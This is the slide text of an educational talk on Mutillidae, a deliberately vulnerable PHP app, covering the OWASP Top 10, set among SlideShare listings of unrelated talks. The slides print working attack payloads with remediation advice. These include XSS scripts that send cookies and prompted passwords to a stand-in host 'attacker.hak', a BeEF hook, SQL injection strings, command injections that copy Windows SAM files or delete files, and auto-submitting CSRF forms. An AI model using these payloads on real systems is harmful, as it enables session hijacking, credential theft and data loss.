AppSec EU 2009 - HTTP Parameter Pollution by Luca Carettoni and Stefano di P...
 
AppSec EU 2011 - An Introduction to ZAP by Simon Bennetts
AppSec EU 2011 - An Introduction to ZAP by Simon BennettsAppSec EU 2011 - An Introduction to ZAP by Simon Bennetts
AppSec EU 2011 - An Introduction to ZAP by Simon Bennetts
 
OWASP Floripa - Web Spiders: Automação para Web Hacking by Antonio Costa aka ...
OWASP Floripa - Web Spiders: Automação para Web Hacking by Antonio Costa aka ...OWASP Floripa - Web Spiders: Automação para Web Hacking by Antonio Costa aka ...
OWASP Floripa - Web Spiders: Automação para Web Hacking by Antonio Costa aka ...
 
AppSec Brazil 2010 - Utilizando a ESAPI para prover Segurança em Aplicações W...
AppSec Brazil 2010 - Utilizando a ESAPI para prover Segurança em Aplicações W...AppSec Brazil 2010 - Utilizando a ESAPI para prover Segurança em Aplicações W...
AppSec Brazil 2010 - Utilizando a ESAPI para prover Segurança em Aplicações W...
 
AppSec DC 2009 - Learning by breaking by Chuck Willis
AppSec DC 2009 - Learning by breaking by Chuck WillisAppSec DC 2009 - Learning by breaking by Chuck Willis
AppSec DC 2009 - Learning by breaking by Chuck Willis
 
Just4Meeting 2012 - How to protect your web applications
Just4Meeting 2012 - How to protect your web applicationsJust4Meeting 2012 - How to protect your web applications
Just4Meeting 2012 - How to protect your web applications
 
GTS 17 - OWASP em prol de um mundo mais seguro
GTS 17 - OWASP em prol de um mundo mais seguroGTS 17 - OWASP em prol de um mundo mais seguro
GTS 17 - OWASP em prol de um mundo mais seguro
 
ENSOL 2011 - OWASP e a Segurança na Web
ENSOL 2011 - OWASP e a Segurança na WebENSOL 2011 - OWASP e a Segurança na Web
ENSOL 2011 - OWASP e a Segurança na Web
 
BHack 2012 - How to protect your web applications
BHack 2012 - How to protect your web applicationsBHack 2012 - How to protect your web applications
BHack 2012 - How to protect your web applications
 

Recently uploaded

Mission to Decommission: Importance of Decommissioning Products to Increase E...
Mission to Decommission: Importance of Decommissioning Products to Increase E...Mission to Decommission: Importance of Decommissioning Products to Increase E...
Mission to Decommission: Importance of Decommissioning Products to Increase E...
Product School
 
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
Product School
 
Knowledge engineering: from people to machines and back
Knowledge engineering: from people to machines and backKnowledge engineering: from people to machines and back
Knowledge engineering: from people to machines and back
Elena Simperl
 
The Future of Platform Engineering
The Future of Platform EngineeringThe Future of Platform Engineering
The Future of Platform Engineering
Jemma Hussein Allen
 
From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...
From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...
From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...
Product School
 
Accelerate your Kubernetes clusters with Varnish Caching
Accelerate your Kubernetes clusters with Varnish CachingAccelerate your Kubernetes clusters with Varnish Caching
Accelerate your Kubernetes clusters with Varnish Caching
Thijs Feryn
 
Connector Corner: Automate dynamic content and events by pushing a button
Connector Corner: Automate dynamic content and events by pushing a buttonConnector Corner: Automate dynamic content and events by pushing a button
Connector Corner: Automate dynamic content and events by pushing a button
DianaGray10
 
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
UiPathCommunity
 
JMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and GrafanaJMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and Grafana
RTTS
 
From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...
From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...
From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...
Product School
 
Neuro-symbolic is not enough, we need neuro-*semantic*
Neuro-symbolic is not enough, we need neuro-*semantic*Neuro-symbolic is not enough, we need neuro-*semantic*
Neuro-symbolic is not enough, we need neuro-*semantic*
Frank van Harmelen
 
Epistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI supportEpistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI support
Alan Dix
 
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Product School
 
DevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA ConnectDevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA Connect
Kari Kakkonen
 
Leading Change strategies and insights for effective change management pdf 1.pdf
Leading Change strategies and insights for effective change management pdf 1.pdfLeading Change strategies and insights for effective change management pdf 1.pdf
Leading Change strategies and insights for effective change management pdf 1.pdf
OnBoard
 
UiPath Test Automation using UiPath Test Suite series, part 3
UiPath Test Automation using UiPath Test Suite series, part 3UiPath Test Automation using UiPath Test Suite series, part 3
UiPath Test Automation using UiPath Test Suite series, part 3
DianaGray10
 
How world-class product teams are winning in the AI era by CEO and Founder, P...
How world-class product teams are winning in the AI era by CEO and Founder, P...How world-class product teams are winning in the AI era by CEO and Founder, P...
How world-class product teams are winning in the AI era by CEO and Founder, P...
Product School
 
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
Sri Ambati
 
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered QualitySoftware Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Inflectra
 
Key Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdfKey Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdf
Cheryl Hung
 

Recently uploaded (20)

Mission to Decommission: Importance of Decommissioning Products to Increase E...
Mission to Decommission: Importance of Decommissioning Products to Increase E...Mission to Decommission: Importance of Decommissioning Products to Increase E...
Mission to Decommission: Importance of Decommissioning Products to Increase E...
 
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
 
Knowledge engineering: from people to machines and back
Knowledge engineering: from people to machines and backKnowledge engineering: from people to machines and back
Knowledge engineering: from people to machines and back
 
The Future of Platform Engineering
The Future of Platform EngineeringThe Future of Platform Engineering
The Future of Platform Engineering
 
From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...
From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...
From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...
 
Accelerate your Kubernetes clusters with Varnish Caching
Accelerate your Kubernetes clusters with Varnish CachingAccelerate your Kubernetes clusters with Varnish Caching
Accelerate your Kubernetes clusters with Varnish Caching
 
Connector Corner: Automate dynamic content and events by pushing a button
Connector Corner: Automate dynamic content and events by pushing a buttonConnector Corner: Automate dynamic content and events by pushing a button
Connector Corner: Automate dynamic content and events by pushing a button
 
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
 
JMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and GrafanaJMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and Grafana
 
From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...
From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...
From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...
 
Neuro-symbolic is not enough, we need neuro-*semantic*
Neuro-symbolic is not enough, we need neuro-*semantic*Neuro-symbolic is not enough, we need neuro-*semantic*
Neuro-symbolic is not enough, we need neuro-*semantic*
 
Epistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI supportEpistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI support
 
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
 
DevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA ConnectDevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA Connect
 
Leading Change strategies and insights for effective change management pdf 1.pdf
Leading Change strategies and insights for effective change management pdf 1.pdfLeading Change strategies and insights for effective change management pdf 1.pdf
Leading Change strategies and insights for effective change management pdf 1.pdf
 
UiPath Test Automation using UiPath Test Suite series, part 3
UiPath Test Automation using UiPath Test Suite series, part 3UiPath Test Automation using UiPath Test Suite series, part 3
UiPath Test Automation using UiPath Test Suite series, part 3
 
How world-class product teams are winning in the AI era by CEO and Founder, P...
How world-class product teams are winning in the AI era by CEO and Founder, P...How world-class product teams are winning in the AI era by CEO and Founder, P...
How world-class product teams are winning in the AI era by CEO and Founder, P...
 
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
 
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered QualitySoftware Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
 
Key Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdfKey Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdf
 

Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek

  • 2. http://Irongeek.com  I run Irongeek.com  I have an interest in InfoSec education  I don’t know everything - I’m just a geek with time on my hands  I’m also not a professional web developer, creating crappy code was easy or me.   So why listen to me? Sometimes it takes a noob to teach a noob.
  • 3. http://Irongeek.com  OWASP Top 10 http://www.owasp.org/index.php/OWASP_Top_Ten_Project (As a side note, I’ve copied quite of few of their descriptions and fixes into this presentation)  Mutillidae http://www.irongeek.com/i.php?page=security/mutillidae- deliberately-vulnerable-php-owasp-top-10  Ok, but what are those?
  • 4. http://Irongeek.com The 2007 list includes:  A1 - Cross Site Scripting (XSS)  A2 - Injection Flaws  A3 - Malicious File Execution  A4 - Insecure Direct Object Reference  A5 - Cross Site Request Forgery (CSRF)  A6 - Information Leakage and Improper Error Handling  A7 - Broken Authentication and Session Management  A8 - Insecure Cryptographic Storage  A9 - Insecure Communications  A10 - Failure to Restrict URL Access The OWASP Top Ten represents a broad consensus about what the most critical web application security flaws are.
  • 5. http://Irongeek.com  A teaching tool for illustrating the OWASP 10  Written in PHP/MySQL  Meant to be simpler than WebGoat  Simple to exploit, just to get the concept across  Easy to reset  Includes a “Tips” function to help the student
  • 6. http://Irongeek.com 1. Download Mutillidae http://www.irongeek.com/i.php?page=security/mutillidae- deliberately-vulnerable-php-owasp-top-10 2. Grab XAMPP Lite and install it http://www.apachefriends.org/en/xampp.html 3. Put the Mutillidae files in htdocs 4. May want to edit xamppliteapacheconfhttpd.conf and set “Listen 127.0.0.1:80 “
  • 7. http://Irongeek.com XSS flaws occur whenever an application takes user supplied data and sends it to a web browser without first validating or encoding that content. XSS allows attackers to execute script in the victim's browser which can hijack user sessions, deface web sites, possibly introduce worms, etc.
  • 8. http://Irongeek.com  Simple: <script>alert("XSS");</script>  Page Redirect: <script>window.location = "http://www.irongeek.com/"</script>  Cookie Stealing: <script> new Image().src="http://attacker.hak/catch.php?cookie="+encod eURI(document.cookie); </script>
  • 9. http://Irongeek.com  Simple: <script>alert("XSS");</script>  Page Redirect: <script>window.location = "http://www.irongeek.com/"</script>  Cookie Stealing: <script> new Image().src="http://attacker.hak/catch.php?cookie="+encodeURI(document.cookie); </script>  Password Con: <script> username=prompt('Please enter your username',' '); password=prompt('Please enter your password',' '); document.write("<img src="http://attacker.hak/catch.php?username="+username+"&password="+password+"" >"); </script>
  • 10. http://Irongeek.com  External Javascript: <script src="http://ha.ckers.org/xss.js"> </script>  Hot BeEF Injection: <script language='Javascript' src='http://localhost/beef/hook/beefmagic.js.php'></script>  How about the User Agent string?
  • 11. http://Irongeek.com  Mangle XSS to bypass filters: http://ha.ckers.org/xss.html  BeEF browser exploitation framework http://www.bindshell.net/tools/beef  XSS Me Firefox plugin https://addons.mozilla.org/en-US/firefox/addon/7598  Exotic Injection Vectors http://www.irongeek.com/i.php?page=security/xss-sql-and- command-inject-vectors
  • 12. http://Irongeek.com  Input validation.  Strong output encoding. htmlspecialchars()  Specify the output encoding.  Do not use "blacklist" validation to detect XSS in input or to encode output.  Watch out for canonicalization errors.
  • 13. http://Irongeek.com Injection flaws, particularly SQL injection, are common in web applications. Injection occurs when user-supplied data is sent to an interpreter as part of a command or query. The attacker's hostile data tricks the interpreter into executing unintended commands or changing data.
  • 14. http://Irongeek.com The Code: “SELECT * FROM accounts WHERE username='". $username ."' AND password='".stripslashes($password).”’” or echo shell_exec("nslookup " . $targethost);'“ Expected to fill in the string to: SELECT * FROM accounts WHERE username=‘adrian' AND password=‘somepassword’ or Nslookup irongeek.com But what if the person injected: SELECT * FROM accounts WHERE username=‘adrian' AND password=‘somepassword’ or 1=1 -- ’ or Nslookup irongeek.com && del *.*
  • 15. http://Irongeek.com  Simple SQL Injection: ' or 1=1 --  Wish I could do this, but can't stack in MySQL/PHP '; DROP TABLE owasp10; --  Command Injections: && dir && wmic process list && wmic useraccount list && copy c:WINDOWSrepairsam && copy c:WINDOWSrepairsystem.bak  (use ; as a separator if you are running this on Linux)
  • 16. http://Irongeek.com  SQL Injection Cheat Sheet http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/  SQL Injection Attacks by Example http://unixwiz.net/techtips/sql-injection.html  Command line Kung Fu http://blog.commandlinekungfu.com/
  • 17. http://Irongeek.com  Input validation.  Use strongly typed parameterized query APIs (bound parameters).  Enforce least privilege.  Avoid detailed error messages.  Show care when using stored procedures.  Do not use dynamic query interfaces.  Do not use simple escaping functions.  Watch out for canonicalization errors.
  • 18. http://Irongeek.com Code vulnerable to remote file inclusion (RFI) allows attackers to include hostile code and data, resulting in devastating attacks, such as total server compromise. Malicious file execution attacks affect PHP, XML and any framework which accepts filenames or files from users.
  • 19. http://Irongeek.com  Grabbing a local file: http://target.hak/index.php?page=source- viewer.php&php_file_name=config.inc  Tamper Data, POST data and an inadvertent proxy
  • 20. http://Irongeek.com  Tamper Data Firefox Plugin https://addons.mozilla.org/en-US/firefox/addon/966  Paros http://www.parosproxy.org/index.shtml  WebScarab http://www.owasp.org/index.php/Category:OWASP _WebScarab_Project
  • 21. http://Irongeek.com  Strongly validate user input using "accept known good" as a strategy  Add firewall rules to prevent web servers making new connections to external web sites and internal systems.  Consider implementing a chroot jail or other sand box mechanisms.  # PHP: Disable allow_url_fopen and allow_url_include in php.ini and consider .building PHP locally to not include this functionality.  # PHP: Disable register_globals and use E_STRICT to find uninitialized variables.  # PHP: Ensure that all file and streams functions (stream_*) are carefully vetted.
  • 22. http://Irongeek.com A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, database record, or key, as a URL or form parameter. Attackers can manipulate those references to access other objects without authorization.
  • 23. http://Irongeek.com  You already saw it with the malicious file include demo.
  • 24. http://Irongeek.com  Avoid exposing your private object references to users whenever possible, such as primary keys or filenames.  Validate any private object references extensively with an "accept known good" approach.  Verify authorization to all referenced objects.
  • 25. http://Irongeek.com A CSRF attack forces a logged-on victim's browser to send a pre-authenticated request to a vulnerable web application, which then forces the victim's browser to perform a hostile action to the benefit of the attacker. CSRF can be as powerful as the web application that it attacks.
  • 26. http://Irongeek.com Target Web App Client Website the attacker controls 1. Session established with web app via a cookie. (already logged in) 2. At some later point, content that the attacker controls is requested. 3. Attacker serves up content that asks client’s browser to make a request. 4. Client makes request, and since it already has a session cookie the request is honored.
  • 27. http://Irongeek.com  Let visit a page with this lovely link: <img src="http://target.hak/index.php?page=add-to-your- blog.php&input_from_form=hi%20there%20monkeyboy">  Don’t want to use a bad image? Try an Iframe: <iframe src="http://target.hak/index.php?page=add-to-your- blog.php&input_from_form=hi%20there%20monkeyboy"" style="width:0px; height:0px; border: 0px"></iframe>  Can’t use the GET method? Try something like: <html> <body> <form name="csrfform" method="post" action="http://target.hak/index.php?page=add-to-your-blog.php"> <input type='hidden' name='input_from_form' value="Test of of auto submitted form."> </form> <script>document.csrfform.submit()</script> </body></html>
  • 28. http://Irongeek.com  CSRF Flaws Found On Major Websites, Including a Bank http://it.slashdot.org/article.pl?sid=08/09/30/0136219  CSRF Home Router Fun http://www.gnucitizen.org/blog/persistent-xss-and-csrf-on-wireless-g- adsl-gateway-with-speedbooster-wag54gs/  CSRF in Gmail http://www.gnucitizen.org/blog/google-gmail-e-mail-hijack-technique/
  • 29. http://Irongeek.com  For sensitive data or value transactions, re-authenticate or use transaction signing to ensure that the request is genuine.  Do not use GET requests (URLs) for sensitive data or to perform value transactions. (see next point)  POST alone is insufficient protection.  Consider adding Captchas and extra sessions values as hidden form elements.
  • 30. http://Irongeek.com  Deliberately Insecure Web Applications For Learning Web App Security http://www.irongeek.com/i.php?page=security/deli berately-insecure-web-applications-for-learning- web-app-security
  • 31. http://Irongeek.com  SamuraiWTF http://samurai.inguardians.com/  OWASP Live CD http://www.owasp.org/index.php/Category:OWASP_Live_CD_Project  BackTrack http://www.remote-exploit.org/backtrack.html
  • 32. http://Irongeek.com  Free ISSA classes  ISSA Meeting http://issa-kentuckiana.org/  Louisville Infosec http://www.louisvilleinfosec.com/  Phreaknic/Notacon/Outerz0ne http://phreaknic.info http://notacon.org/ http://www.outerz0ne.org/